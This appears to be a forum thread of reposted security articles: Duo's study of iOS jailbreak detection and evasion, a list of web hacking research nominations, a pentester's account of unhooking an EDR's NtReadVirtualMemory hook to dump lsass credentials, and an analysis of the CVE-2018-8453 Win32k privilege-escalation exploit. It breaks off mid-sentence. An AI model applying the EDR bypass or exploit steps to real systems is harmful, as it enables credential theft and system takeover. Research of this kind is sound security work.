users. Sursa: https://github.com/drk1wi/Modlishka
  8. JANUARY 18TH, 2019 Jailbreak Detector Detector: An Analysis of Jailbreak Detection Methods and the Tools Used to Evade Them Why Do People Jailbreak? Apple’s software distribution and security model relies on end users running software exclusively distributed by Apple, either via inclusion in the base operating system or via the App Store. To run applications that are not available in the App Store or make modifications to the behavior of the operating system, a “jailbreak” is required—effectively, an exploit that allows the user to gain administrative access to the iOS device. After jailbreaking, users can install applications and tweaks via unofficial app stores. Jailbroken devices are also excellent tools for security researchers. iOS kernel security research is significantly easier with root-level access to the device. Gal Beniamini from Google’s Project Zero says: Apple does not provide a “developer-mode” iPhone, nor is there a mechanism to selectively bypass the security model. This means that in order to meaningfully explore the system, researchers are forced to subvert the device’s security model (i.e., by jailbreaking). In short, people jailbreak their devices for many reasons, ranging from research to personal philosophy. Regardless of the user’s rationale, the presence of a jailbreak on a device means that the security model of the OS can no longer be adequately trusted or reasoned about by an application. The History of Jailbreaking The first iPhone was released in June 2007, and in August 2007, George Hotz became the first person to carrier-unlock the iPhone. A carrier-unlock is not the same as a jailbreak, but in this case, jailbreaking the device was a prerequisite. Hotz’s original exploit required a small hardware modification to the device, but software-only jailbreaks were released soon after. Since then, Apple and jailbreak developers have been in a cat-and-mouse game, with Apple patching vulnerabilities while developers and researchers attempt to find new ones. The jailbreak scene has shrunk significantly since the release of the original iPhone. As Apple hardens the security of its iOS devices, exploiting them becomes significantly harder. The value of an iOS exploit on the private market is easily several hundred thousand dollars, and can also exceed $1,000,000 under the right criteria (remote, persistent and zero-click), making a private sale a much more lucrative option than releasing it publicly. Why Do We Care About Jailbreaking at Duo? At Duo, we give administrators insight into the health of devices used to access corporate resources. In a BYOD context, it is important to be able to understand the security properties of the devices on your network. Jailbreaking an iOS device does not, on its own, make it less secure. There are two main issues with the security of a jailbroken device: First, running untrusted (non-App-Store*) code on the device, especially outside of the sandbox, makes it harder to reason about the security properties of the device. The second, more concerning issue is that users of jailbroken devices frequently hold off on updating their devices, as jailbreak development usually lags behind official software releases. Administrators may want to only allow up-to-date devices access to resources on their network, as software updates frequently patch security vulnerabilities. A jailbroken device can masquerade as an up-to-date device by misreporting its software version. As a result, administrators cannot trust version information submitted by jailbroken devices, so it is important to be able to detect the jailbroken state. * While, in general, we can expect that the App Store review process will prevent actively malicious applications from distribution on the App Store, this is not always the case. The XcodeGhost malware is an example of how malicious code was shipped as part of well-known and trusted applications on the App Store. How Are Jailbreaks Usually Detected? There exists only scattered information online about jailbreak detection methodology. This is partially because jailbreak detection is a sort of “special sauce.” Developers of mobile applications would rather keep their methodology private, and there are no real incentives to talking about it publicly. I was able to learn about existing jailbreak detection methods from some online documentation and communities like r/jailbreak, but most of the useful information I learned in the course of this research came from reverse engineering popular anti-jailbreak-detection tools. Most jailbreak detection methods fall into the following categories: File existence checks URI scheme registration checks Sandbox behavior checks Dynamic linker inspection File Existence Most public jailbreak methods leave behind certain files on the filesystem. The clearest example is Cydia. Cydia is an alternative app store commonly used to distribute tweaks (UI changes, extra gestures, etc.) and third-party applications to users of jailbroken devices. As a result, nearly every jailbroken device has a directory at /Applications/Cydia.app. If this file exists on the filesystem, you can be sure your application is running on a jailbroken device. There are also various binaries such as bash and sshd commonly found on jailbroken devices, as well as files intentionally left by jailbreak utilities to mark that a device has already been jailbroken, preventing the utility from running twice and possibly causing unintended harm. URI Schemes iOS applications can register custom URI schemes. Duo uses this functionality so that clickable web links can open the Duo Mobile app, making the setup of Duo Mobile easy. Cydia registered the cydia:// URI scheme to allow direct links to apps available via Cydia. iOS allows applications to check which URI schemes are registered, so the presence of the cydia://URI scheme is frequently used to check if Cydia is installed and the device is jailbroken. Unfortunately, some apps perform this detection by attempting to register the cydia:// URI scheme for themselves, so checking if the scheme is registered may produce a false-positive on a non-jailbroken device. Sandbox Behavior Jailbreaks frequently patch the behavior of the iOS application sandbox. As an example, calls to fork() are disallowed on a stock iOS device: an iOS app may not spawn a child process. If you are able to successfully execute fork(), your code is likely running on a jailbroken device. Dynamic Linker Inspection Dynamic linking is a way for executables to take advantage of code provided by other libraries without compiling and shipping that code in the executable. This helps different executables reuse code without including a copy of it. Dynamic linking allows for much smaller binaries with the same functionality - the alternative to this is “static linking,” where all code that an executable uses is shipped with the executable. While we haven’t discussed them yet, anti-jailbreak-detection tools are frequently loaded as dynamic libraries. The iOS dynamic linker is called dyld, and exposes the ability to inspect the libraries loaded into the currently-running process. As a result, we should be able to detect the presence of anti-jailbreak-detection tools by looking at the names and numbers of libraries loaded into the current process. If an anti-jailbreak-detection tool is running, we know the device is jailbroken. How Do End Users Prevent Detection? Many mobile applications will refuse to run if they detect that the device they are running on is jailbroken. In Duo’s case, we do not prevent use of the Duo Mobile app, but Duo administrators may prevent jailbroken devices from authenticating to protected applications. For these reasons, users of jailbroken devices frequently install anti-jailbreak-detection tools that aim to hide the tampered status of the device. These tools modify operating system functionality such that the device acts as though it were in an untampered state. They are effectively a type of intentionally installed rootkit, though generally running in userland rather than in the iOS kernel. The specific functions that are hooked and the methods used to hook them vary. Objective-C Runtime Method Hooking Objective-C dispatches method calls at runtime. Calling a method is akin to sending a message (ala Smalltalk). This stands counter to languages like C in which a function call might take the form of a jump to the called method’s location in memory. Because method calls are dispatched at runtime, Objective-C also allows you to add or replace methods at runtime. This is sometimes referred to as “method swizzling,” and takes the form of a call to class_addMethod or method_setImplementation. fileExistsAtPath is an Objective-C method commonly used to check for the existence of jailbreak artifacts. Replacing the implementation of fileExistsAtPath to always return false for a list of known jailbreak artifacts is a common strategy to defeat this jailbreak detection technique. Editing the Linker Table When a dynamically loaded library is used in an executable, its symbols must be bound: the executable has to figure out where the shared code actually lives in memory. On an iOS system using dyld, a call to printf, for example, is actually a call to an address that lives in the __stubs section. At this address is a single jmp instruction to an address loaded from the __la_symbol_ptr (lazy symbol pointers) or __nl_symbol_ptr (non-lazy symbol pointers) section. Lazy symbol pointers are resolved the first time they are called, and non-lazy symbol pointers are resolved before the program runs. You can read more about how the linker works on Mike Ash’s blog, but the important thing to understand is that the entry in the __xx_symbol_ptr table will, after the symbol has been resolved, contain the proper address for the function being called. A consequence of this design is that if you want to hook every call to printf, you can do so by replacing a single entry in the __la_symbol_ptr section. All calls to printf from that point on will jump to your custom hook. Anti-jailbreak-detection tools make use of this technique to hook functions that may be used to check for file existence or that may expose non-standard sandbox behavior. This is an example of a hooked version of the fopen function. As a reminder, the fopen function will attempt to open a file (by path name), and either return a pointer to the open file handle or null if it cannot open the file. If fopen returns non-null when called with a path to a known jailbreak artifact, you can be sure the device is jailbroken. The above hooked version checks the path of the file to be opened against a list of “forbidden” files. These are known jailbreak artifacts as well as files that are usually present on the system but can only be opened if the sandbox has been modified. The hooked fopen will act as though those files do not exist or cannot be opened, and otherwise defer to the original fopen implementation. Functions like fopen, lstat, etc. are hooked to prevent detection of files on the filesystem. Some other functions, such as fork, as hooked to always return a constant value (for example: a hooked version of fork may return -1, indicating that fork is not allowed, which is consistent with the behavior of an untampered sandbox). Patching the Linker We mentioned that dyld exposes functionality that allows clients to inspect what libraries have been loaded into the running process. Anti-jailbreak-detection tools are loaded into processes as shared libraries, and dyld will expose this. To combat this, some anti-jailbreak-detection tools also hook exposed dyld functionality to hide their presence. A slightly more interesting way to detect the presence of a jailbreak using the dynamic linker makes use of dlsym to try to determine the addresses of the original, unhooked functions. dlsym should give you the correct address for a dynamically linked function, even if its entry in the linker symbol table has been overwritten. Some anti-jailbreak-detection tools are aware of this, and will actually intercept calls to dlsym and return pointers to the hooked functions. This is an interesting example of the cat-and-mouse game that has been played between app developers who wish to detect jailbroken devices and hobby developers who maintain anti-jailbreak-detection tools. Summary These are only some of the methods used to evade jailbreak detection. While they differ in nature, they all rely on various forms of indirection: functionality provided by the Objective-C runtime or by shared libraries can be overridden with ease and made to report “correct” answers, similar to a rootkit. An ideal jailbreak detection method would rely on as little indirection as possible. Can We Reliably Detect Jailbroken Devices? We would like to look for artifacts of a jailbroken device (existence of certain files, sandbox behavior, etc,) while relying on as little shared functionality as possible. However, we need to rely on functionality exposed by the operating system to make these checks. In the usual case, to check if a file can be opened, we would call the fopen syscall wrapper exposed as part of a shared library. As detailed in previous sections, functions in shared libraries might be replaced with tampered versions that prevent our checks from working. As a refresher, a syscall is an interface to privileged functionality exposed to userspace code by the kernel. It may be dangerous to allow userspace code to directly read or write blocks on a hard drive, for example, so we instead use the open syscall to say “hey kernel, can you please perform the privileged action of opening this file for me, and then give me a handle I can use to interact with it.” Functions like fopen are just that—functions—but they wrap a special type of instruction used to jump into the kernel. On the x86 architecture, under Linux, the INT 0x80 instruction is the most well-known way to perform a syscall (with newer options available, like the x86-64 syscall instruction). INT stands for “interrupt,” and the INT instruction causes the CPU to jump to a special section of code called an interrupt handler, running in the context of the kernel. The end result is that userspace can trigger the execution of privileged code in a controlled manner, without being able to arbitrarily execute privileged code. The iPhone uses the ARM processor architecture. ARM’s equivalent of INT is the SVC opcode (“Supervisor Call”), and the equivalent to INT 0x80 on an ARM processor is SVC 0x80. Functions like fopen may do some sanity-checking and processing of arguments in user-space, but they will eventually use SVC 0x80 to ask the kernel to perform the privileged action of providing access to a file. The important takeaway here is that if we would like to avoid relying on shared wrapper functions that may be hooked, we can actually perform syscalls directly using the same opcodes the wrapper functions use. We can also inline these calls to avoid having a single call target for our custom syscall wrappers that might be overwritten. This lets us avoid the layers of indirection that come with jumping to functions exposed by shared libraries, shielding us from possible symbol table tampering. Drawbacks Even though this approach solves some of our problems, there are drawbacks. First, writing custom syscall wrappers can require maintenance, especially if there are new architectures you need to support. Additionally, the syscall interface may change over time, and the shared libraries provided by the operating system will keep up with those changes, whereas your custom implementation may not. Second, while this approach makes it harder for end users to evade jailbreak detection, it doesn’t make it impossible. The flow of the data after the syscall—say, a boolean that indicates whether a jailbreak artifact exists—is still vulnerable to tampering. Additionally, a determined attacker could patch out the checks, or even possibly modify the kernel. Conclusion Approaches like this must be considered in the context of a threat model. It is impossible to guaranteethat you will be able to detect a tampered device for the simple reason that you are restricted to running in userspace, whereas anti-jailbreak-detection utilities can run in a privileged context. With that said, the goal is not perfect security, but rather sufficient security such that the average end user of a jailbroken device—who is not a determined attacker—will not be able to evade detection. Ultimately, the security of your application cannot rely on hiding the way it works. Proper server-side validation of client-submitted data, use of well-known cryptographic protocols, and use of hardware-backed cryptographic functionality available in many newer devices all go a long way to strengthening the security posture of your application without relying on obscurity. Sursa: https://duo.com/blog/jailbreak-detector-detector
  9. Top 10 web hacking techniques of 2018 - nominations open James Kettle | 03 January 2019 at 14:43 UTC Nominations are now open for the top 10 new web hacking techniques of 2018. Every year countless security researchers share their findings with the community. Whether they're elegant attack refinements, empirical studies, or entirely new techniques, many of them contain innovative ideas capable of inspiring new discoveries long after publication. And while some inevitably end up on stage at security conferences, others are easily overlooked amid a sea of overhyped disclosures, and doomed to fade into obscurity. As such, each year we call upon the community to help us seek out, distil, and preserve the very best new research for future readers. As with last year, we’ll do this in three phases: Jan 1st: Start to collect community nominations Jan 21st: Launch community vote to build shortlist of top 15 Feb 11th: Panel vote on shortlist to select final top 10 Last year we decided to prevent conflicts of interest by excluding PortSwigger research, but found the diverse voting panel meant we needed a better system. We eventually settled on disallowing panelists from voting on research they’re affiliated with, and adjusting the final scores to compensate. This approach proved fair and effective, so having checked with the community we'll no longer exclude our own research. To nominate a piece of research, either use this form or reply to this Twitter thread. Feel free to make multiple nominations, and nominate your own research, etc. It doesn't matter whether the submission is a blog post, whitepaper, or presentation recording - just try to submit the best format available. If you want, you can take a look at past years’ top 10 to get an idea for what people feel constitutes great research. You can find previous year's results here: 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016/17. Nominations so far Here are the nominations so far. We're making offline archives of them all as we go, so we can replace any that go missing in future. I'll do a basic quality filter before the community vote starts. How I exploited ACME TLS-SNI-01 issuing Let’s Encrypt SSL-certs for any domain using shared hosting Kicking the Rims - A Guide for Securely Writing and Auditing Chrome Extensions | The Hacker Blog EdOverflow | An analysis of logic flaws in web-of-trust services. OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies PowerPoint Presentation - OWASP_AppSec_EU18_WordPress.pdf Scratching the surface of host headers in Safari RCE by uploading a web.config – 003Random’s Blog Security: HTTP Smuggling, Apsis Pound load balancer | RBleug Piercing the Veil: Server Side Request Forgery to NIPRNet access inputzero: A bug that affects million users - Kaspersky VPN | Dhiraj Mishra inputzero: Telegram anonymity fails in desktop - CVE-2018-17780 | Dhiraj Mishra inputzero: An untold story of skype by microsoft | Dhiraj Mishra Neatly bypassing CSP – Wallarm Large-Scale Analysis of Style Injection by Relative Path Overwrite - www2018rpo_paper.pdf Beyond XSS: Edge Side Include Injection :: GoSecure GitHub - HoLyVieR/prototype-pollution-nsec18: Content released at NorthSec 2018 for my talk on prototype pollution Logically Bypassing Browser Security Boundaries - Speaker Deck Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out Web Cache Deception Attack - YouTube Duo Finds SAML Vulnerabilities Affecting Multiple Implementations | Duo Security #307670 Difference in query string parameter processing between Hacker News and Keybase Chrome extension spawns chat to incorrect user lanmaster53.com Beyond XSS: Edge Side Include Injection :: GoSecure Scratching the surface of host headers in Safari #309531 Stored XSS in Snapmatic + R★Editor comments InsertScript: Adobe Reader PDF - Client Side Request Injection $36k Google App Engine RCE - Ezequiel Pereira MKSB(en): CVE-2018-5175: Universal CSP strict-dynamic bypass in Firefox #341876 SSRF in Exchange leads to ROOT access in all instances reCAPTCHA bypass via HTTP Parameter Pollution – Andres Riancho Data Exfiltration via Formula Injection #Part1 Read&Write Chrome Extension Same Origin Policy (SOP) Bypass Vulnerability | The Hacker Blog Firefox uXSS and CSS XSS - Abdulrahman Al-Qabandi Server-Side Spreadsheet Injection - Formula Injection to Remote Code Execution - Bishop Fox Bypassing Web-Application Firewalls by abusing SSL/TLS | 0x09AL Security blog Evading CSP with DOM-based dangling markup | Blog Save Your Cloud: DoS on VMs in OpenNebula 4.6.1 CRLF Injection Into PHP’s cURL Options – TomNomNom – Medium Practical Web Cache Poisoning | Blog #317476 Account Takeover in Periscope TV A timing attack with CSS selectors and Javascript VPN Extensions are not for privacy Exposing Intranets with reliable Browser-based Port scanning | Blog Exploiting XXE with local DTD files A story of the passive aggressive sysadmin of AEM - Speaker Deck Hunting for security bugs in AEM webapps - Speaker Deck ASP.NET resource files (.RESX) and deserialisation issues Story of my two (but actually three) RCEs in SharePoint in 2018 | Soroush Dalili (@irsdl) – سروش دلیلی Beware of Deserialisation in .NET Methods and Classes + Code Execution via Paste! cat ~/footstep.ninja/blog.txt Blog - RCE due to ShowExceptions MB blog: Vulnerability in Hangouts Chat: from open redirect to code execution Blog on Gopherus Tool DNS Rebinding Headless Browsers It's A PHP Unserialization Vulnerability Jim But Not As We Know It James Kettle @albinowax Sursa: https://portswigger.net/blog/top-10-web-hacking-techniques-of-2018-nominations-open
  10. Bypass EDR’s memory protection, introduction to hooking Hoang BuiFollow Jan 18 Introduction On a recent internal penetration engagement, I was faced against an EDR product that I will not name. This product greatly hindered my ability to access lsass’ memory and use our own custom flavor of Mimikatz to dump clear-text credentials. For those who recommends ProcDump The Wrong Path So now, as an ex-malware author — I know that there are a few things you could do as a driver to accomplish this detection and block. The first thing that comes to my mind was Obregistercallback which is commonly used by many Antivirus products. Microsoft implemented this callback due to many antivirus products performing very sketchy winapi hooks that reassemble malware rootkits. However, at the bottom of the msdn page, you will notice a text saying “Available starting with Windows Vista with Service Pack 1 (SP1) and Windows Server 2008.” To give some missing context, I am on a Windows server 2003 at the moment. Therefore, it is missing the necessary function to perform this block. After spending hours and hours, doing black magic stuff with csrss.exe and attempting to inherit a handle to lsass.exe through csrss.exe, I was successful in gaining a handle with PROCESS_ALL_ACCESS to lsass.exe. This was through abusing csrss to spawn a child process and then inherit the already existing handle to lsass. There is no EDR solution on this machine, this was just an PoC However, after thinking “I got this!” and was ready to rejoice in victory over defeating a certain EDR, I was met with a disappointing conclusion. The EDR blocked the shellcode injection into csrss as well as the thread creation through RtlCreateUserThread. However, for some reason — the code while failing to spawn as a child process and inherit the handle, was still somehow able to get the PROCESS_ALL_ACCESS handle to lsass.exe. WHAT?! Hold up, let me try just opening a handle to lsass.exe without any fancy stuff with just this line: HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, lsasspid); And what do you know, I got a handle with FULL CONTROL over lsass.exe. The EDR did not make a single fuzz about this. This is when I realized, I started off the approach the wrong way and the EDR never really cared about you gaining the handle access. It is what you do afterward with that handle that will come under scrutiny. Back on Track Knowing there was no fancy trick in getting a full control handle to lsass.exe, we can now move forward to find the next point of the issue. Immediately calling MiniDumpWriteDump() with the handle failed spectacularly. Let’s dissect this warning further. “Violation: LsassRead”. I didn’t read anything, what are you talking about? I just want to do a dump of the process. However, I also know that to make a dump of a remote process, there must be some sort of WINAPI being called such as ReadProcessMemory (RPM) inside MiniDumpWriteDump(). Let’s look at MiniDumpWriteDump’s source code at ReactOS. Multiple calls to RPM As you can see by, the function (2) dump_exception_info(), as well as many other functions, relies on (3) RPM to perform its duty. These functions are referenced by MiniDumpWriteDump (1) and this is probably the root of our issue. Now here is where a bit of experience comes into play. You must understand the Windows System Internal and how WINAPIs are processed. Using ReadProcessMemory as an example — it works like this. ReadProcessMemory is just a wrapper. It does a bunch of sanity check such as nullptr check. That is all RPM does. However, RPM also calls a function “NtReadVirtualMemory”, which sets up the registers before doing a syscall instruction. Syscall instruction is just telling the CPU to enter kernel mode which then another function ALSO named NtReadVirtualMemory is called, which does the actual logic of what ReadProcessMemory is supposed to do. — — — — — -Userland — — — —- — — — | — — — Kernel Land — — — — RPM — > NtReadVirtualMemory --> SYSCALL->NtReadVirtualMemory Kernel32 — — -ntdll — — — — — — — — — - — — — — — ntoskrnl With that knowledge, we now must identify HOW the EDR product is detecting and stopping the RPM/NtReadVirtualMemory call. This comes as a simple answer which is “hooking”. Please refer to my previous post regarding hooking here for more information. In short, it gives you the ability to put your code in the middle of any function and gain access to the arguments as well as the return variable. I am 100% sure that the EDR is using some sort of hook through one or more of the various techniques that I mentioned. However, readers should know that most if not all EDR products are using a service, specifically a driver running inside kernel mode. With access to the kernel mode, the driver could perform the hook at ANY of the level in the RPM’s callstack. However, this opens up a huge security hole in a Windows environment if it was trivial for any driver to hook ANY level of a function. Therefore, a solution is to put forward to prevent modification of such nature and that solution is known as Kernel Patch Protection (KPP or Patch Guard). KPP scans the kernel on almost every level and will triggers a BSOD if a modification is detected. This includes ntoskrnl portion which houses the WINAPI’s kernel level’s logic. With this knowledge, we are assured that the EDR would not and did not hook any kernel level function inside that portion of the call stack, leaving us with the user-land’s RPM and NtReadVirtualMemory calls. The Hook To see where the function is located inside our application’s memory, it is as trivial as a printf with %p format string and the function name as the argument, such as below. However, unlike RPM, NtReadVirtualMemory is not an exported function inside ntdll and therefore you cannot just reference to the function like normal. You must specify the signature of the function as well as linking ntdll.lib into your project to do so. With everything in place, let’s run it and take a look! Now, this provides us with the address of both RPM and ntReadVirtualMemory. I will now use my favorite reversing tool to read the memory and analyze its structure, Cheat Engine. ReadProcessMemory NtReadVirtualMemory For the RPM function, it looks fine. It does some stack and register set up and then calls ReadProcessMemory inside Kernelbase (Topic for another time). Which would eventually leads you down into ntdll’s NtReadVirtualMemory. However, if you look at NtReadVirtualMemory and know what the most basic detour hook look like, you can tell that this is not normal. The first 5 bytes of the function is modified and the rest are left as-is. You can tell this by looking at other similar functions around it. All the other functions follows a very similar format: 0x4C, 0x8B, 0xD1, // mov r10, rcx; NtReadVirtualMemory 0xB8, 0x3c, 0x00, 0x00, 0x00, // eax, 3ch — aka syscall id 0x0F, 0x05, // syscall 0xC3 // retn With one difference being the syscall id (which identifies the WINAPI function to be called once inside kernel land). However, for NtReadVirtualMemory, the first instruction is actually a JMP instruction to an address somewhere else in memory. Let’s follow that. CyMemDef64.dll Okay, so we are no longer inside ntdll’s module but instead inside CyMemdef64.dll’s module. Ahhhhh now I get it. The EDR placed a jump instruction where the original NtReadVirtualMemory function is supposed to be, redirect the code flow into their own module which then checked for any sort of malicious activity. If the checks fail, the Nt* function would then return with an error code, never entering the kernel land and execute to begin with. The Bypass It is now very self-evident what the EDR is doing to detect and stop our WINAPI calls. But how do we get around that? There are two solutions. Re-Patch the Patch We know what the NtReadVirtualMemory function SHOULD looks like and we can easily overwrite the jmp instruction with the correct instructions. This will stop our calls from being intercepted by CyMemDef64.dll and enter the kernel where they have no control over. Ntdll IAT Hook We could also create our own function, similar to what we are doing in Re-Patch the Patch, but instead of overwriting the hooked function, we will recreate it elsewhere. Then, we will walk Ntdll’s Import Address Table, swap out the pointer for NtReadVirtualMemory and points it to our new fixed_NtReadVirtualMemory. The advantage of this method is that if the EDR decides to check on their hook, it will looks unmodified. It just is never called and the ntdll IAT is pointed elsewhere. The Result I went with the first approach. It is simple, and it allows me to get out the blog quicker :). However, it would be trivial to do the second method and I have plans on doing just that within a few days. Introducing AndrewSpecial, for my manager Andrew who is currently battling a busted appendix in the hospital right now. Get well soon man. AndrewSpecial.exe was never caught :P Conclusion This currently works for this particular EDR, however — It would be trivial to reverse similar EDR products and create a universal bypass due to their limitation around what they can hook and what they can’t (Thank you KPP). Did I also mention that this works on both 64 bit (on all versions of windows) and 32 bits (untested)? And the source code is available HERE. Thank you again for your time and please let me know if I made any mistake. Sursa: https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6
  11. CVE-2018-8453:Win32k Elevation of Privilege Vulnerability Targeting the Middle East 2019-01-19 By 360威胁情报中心 | 技术研究 Background On October 10, 2018, Kaspersky disclosed a Win32k Elevation of Privilege Exploit (CVE-2018-8453) captured in August. This vulnerability was used as 0day in attacks targeting the Middle East to escalate privileges on the compromised Windows systems. It is related to window management and graphic device interfaces (win32kfull.sys) and could be used to elevate user privileges to system permissions. It can also be used to bypass sandbox protection such as PDF, Office and IE which makes the exploit extremely valuable. 360 Threat Intelligence Center performed deep analysis of this vulnerability and came up with PoC exploit that could work on part of the affected Windows systems (Both x86 and x64 version of Windows10). Analysis Environment The work was performed on Windows 10 x64 Version 1709 with patches before fixing CVE-2018-8453: Root Cause This vulnerability is caused by a fault in the win32kfull!NtUserSetWindowFNID function which fails to check whether the window object has been released while setting the FNID. This causes a new FNID to be set for a window that has already been released (FNID_FREED: 0x8000). By exploiting this defect, we can control the fnDWORD callback called in xxxFreeWindow when the window object get destroyed to cause UAF of pSBTrack in win32kfull!xxxSBTrackInit. About FNID:By checking the leaked source code of WIN2000 and related documentations in ReactOs, we figure out that FNID is used to record what the window looks like, such as a button or an edit box. It can also be used to record the state of the window, for example, FNID_FREED(0x8000) means the window has been released. POC – How to Trigger the Vulnerability The vulnerability could get triggered by following steps: Step 1: We need to hook two callbacks in the KernelCallbackTable first. Step 2: Create the main window and the ScrollBar. Step3: Send a WM_LBUTTONDOWN message to the scroll bar to trigger the call to the xxxSBTraackInit function. Hint: When you perform a left click on a scroll bar, it will trigger the call to win32kfull!xxxSBTrackInit function. After that, function xxxSBTrackLoop will be called to capture mouse events in a loop, until the left mouse button is released or some other messages are received. Step4: Call DestoryWindow(g_hMAINWND) in callback function fnDWORD_hook when it get executed by xxxSBTrackLoop. This will result in calling win32kfull!xxxFreeWindow function. Because cbWndExtra is not 0 while registering the main window, this makes win32kfull!xxxFreeWindow to call xxxClientFreeWindowClassExtraBytes function in order to release the extra data which belongs to the main window. Function in the above picture would execute KernelCallbackTable[126] callback which result in the calling of our second hook. Step5: After entering our second hook function (fnClientFreeWindowClassExtraBytesCallBack_hook), we must manually call NtUserSetWindowFNID(g_hMAINWND,spec_fnid) to set the FNID of the main window (a value from 0x2A1 to 0x2AA, here we set spec_find to 0x2A2). Meanwhile create a new scroll bar (g_hSBWNDNew) and call SetCapture(g_hSBWNDNew) to set g_hSBWNDNew as the window to capture mouse events in the current thread. Step6: Since the main window is destroyed, xxxSBTrackLoop will return and continue to execute HMAssignmentUnLock(&pSBTrack->spwndNotify) to perform related dereference that makes the main window get released completely. This will cause xxxFreeWindow to be called again: From the above picture, we know that once xxxFreeWindow is called, the window's FNID will be marked with 0x8000. Since the FNID of the main window was set to 0x2A2 in step 5, LOWORD(FNID) would be 0x82A2 (DestoryWindow function that get executed in step 4 called xxxFreeWindow to mark the main window with 0x8000). So SfnDWORD will be executed and then get into our hook through callback fnDWORD. When get into fnDWORD_hook function again, it is our last chance to come back to R3. At this time, if SendMessage(g_hSBWNDNew, WM_CANCLEMODE) is called, xxxEndScroll (see win2k code as shown below) will be executed to release pSBTrack. Because the POC program is single threaded, all windows created by the thread point to the same thread information structure. Even if the Scrollbar window that SBTrack belongs to has been released, as long as the new window is created by the same thread, pSBTrack still points to the same one. The condition qp->spwndCapture==pwnd will be satisfied since we are sending the WM_CANCLEMODE message to the newly created scroll bar g_hSBWNDNew, and we have previously called SetCaputure(g_hSBWNDNew) to set the current thread to capture the mouse events in g_hSBTWNDNew window. Finally, UserFreePool(pSBTrack) gets executed to release pSBTrack which makes pSBTrack get released before executing HMAssignmentUnLock(&pSBTrack->spwndSB) and results in Use After Free for pSBTrack. Exploit on Windows 10 x64 Since we can make the pSBTrack in win32kfull!xxxSBTrackInit get released early to make a Use After Free by hooking callbacks in KernelCallbackTable, pool fengshui technology can be used to occupy pSBTrack that has been released early in order to achieve arbitrary memory value deduction in a loop. It can be used with desktop heap memory [2] leak and GDI Palette Abuse technology to achieve arbitrary memory read/write, and finally to achieve privilege escalation! Implementation of Arbitrary Memory Value Deduction From the above analysis, we know that the memory pointed by pSBTrack has been released after calling HMAssignmentUnlock(&pSBTrack->spwndSBNotify). Continue to the next HMAssignmentUnlock(&pSBTrack->spwndSB), then take a look at the disassembly code of HMAssignmentUnlock and you will find a very interesting place: Execution of lock xadd dword ptr [rdx+8],eax will perform minus one operation to the DWORD pointed by rdx+8. After debugging the code, we figure out that pSBTrack->spwndSB is assigned to* rdx*! So, if we can control the value of pSBTrack->spwndSB, then we can perform minus one operation on any memory DWORD. pSBTrack is released after we call SendMessage(g_SBWNDNew, WM_CANCELMODE). So if we can allocate an object (such as Bitmap) with the same size as SBTrack immediately and could control the data of the object, there is a great probability that the pool get freed will be reassigned to the object. Test Results: Similarly, continue to call HMAssignmentUnlock (&pSBTrack->spwndSBTrack), there will be another arbitrary memory value minus one operation, while the memory is pointed by pSBTrack->spwndSBTrack+8. So we can reduce the arbitrary memory value by one or two through controlling the data in the Bitmap that get sprayed into the space previously used by pSBTrack. Minus one operation only requires either pSBTrack->spwndSB or pSBTrack->spwndSBTrack to be 0, and the other one to be address - sizeof(PVOID). As long as we repeatedly trigger this process, we can reduce the memory value by one or two for many times in order to change the value to a specified number. result = target - repeat_count result = target - repeat_count * 2 Obviously we have to know the original value first in order to make it reduced to the value we want. Therefore, there are some limitations when compared with setting the value directly. Hint: If we need to change 0x02000000 to 0x00000000, do we need to repeat the minus two operation for 0x01000000 times? The answer is no. Because we are able to deduct arbitrary memory DWORD value by one or two, the memory address could be adjusted to turn "0x02" into a low Byte in the DWORD. Then it becomes to change 0x00000002 to 0x00000000, here just need one loop and no need to worry about the loop count limitations. Use the GDI Palette to Achieve Arbitrary R/W Below is the documented PALETTE data structure: typedef struct _PALETTE64 { BASEOBJECT64 BaseObject; ... ULONG64 pRGBXlate; PALETTEENTRY *pFirstColor; struct _PALETTE *ppalThis; PALETTEENTRY apalColors[3]; } 1 2 3 4 5 6 7 8 9 10 Member apalColors is an array. Each member in the array is 4 bytes in size and the content can be specified by user. pFirstColor, similar to the pvScan0 pointer in the Bitmap, is pointed to the array and could be used to construct the R/W primitive. The following relationship is satisfied and by using this we can know the initial value of the memory pointed by pFirstColor: Address of PALETTEENTRY = Address of pFirstColor + sizeof(PVOID)*2 1 Similar to manipulating data in the Pixel area by Bitmap through GetBitmapBits and SetBitmapBits, PALETTE will use GetPaletteEntries and SetPaletteEntries to manipulate the data pointed by the pFirstColor. So we can construct two Palettes, named as hManager and hWorker respectively: If we can get the value of hManager's pFirstColor and hWorker's pFirstColor, then we can use the above arbitrary memory value deduction approach to reduce the hManager->pFirstColor value to the same as hWorker's pFirstColor. After that we can use hManager to call SetPaletteEntries to control hWorker->pFirstColor, then use hWorker to call SetPaletteEntries and GetPaletteEntries to achieve arbitrary memory read/write. Fortunately, we can use the following techniques to stabilize the value of hManager's pFirstColor and hWorker's pFirstColor, and make hManager's pFirstColor value not quite larger than hWorker's pFirstColor value. Use the Desktop Heap to Leak GDI Palette Address Since the name of window menu could be quite long, lpszMenuName and Palette are in the same memory pool, and we can get the kernel address of lpszMenuName through the tagWND pointer returned by HmValidateHandle, we can use the desktop heap[2] to help us predict the kernel address of the pFirstColor pointer. With proper construction, the accuracy rate could reach to 100%. First we need to repeatedly create and delete a window object to allocate and release a pit. When the address becomes unchanged, it means the next time you construct a Palette object with a size equal to lpszMenuName, the Palette object will be allocated at the address of the lpszMenuName that has just been released: Then we can get the kernel address of pFirstColor by using its offset inside _PALETTE64: hManager->pFirstColor can be changed to hWorker's pFirstColor value by using the above arbitrary deduction operation in order to achieve arbitrary memory read/write. Privilege Escalation by Arbitrary Memory R/W Since arbitrary memory read/write is available at this moment, we could enumerate EPROCESS chain to get the token value of the system process as well as the token address of the current process. Then we could perform privilege escalation by copying the token value from the system process to the current one. How to get the EPROCESS of the system at the user level? You can get it by looking up PsInitialSystemProcess[3] in ntoskrnl.exe: Code to get _EPROCES of the current process: Use arbitrary memory read/write to copy Token: Exploit Process in Summary 360 Threat Intelligence Center summarized the entire process as follows: Get the pFirstColor value of hManager and hWorker by using desktop heap leak technology Triggering the vulnerability multiple times to change the value of hManager->pFirstColor to the value of pFirstColor in hWorker Perform privilege escalation by arbitrary memory 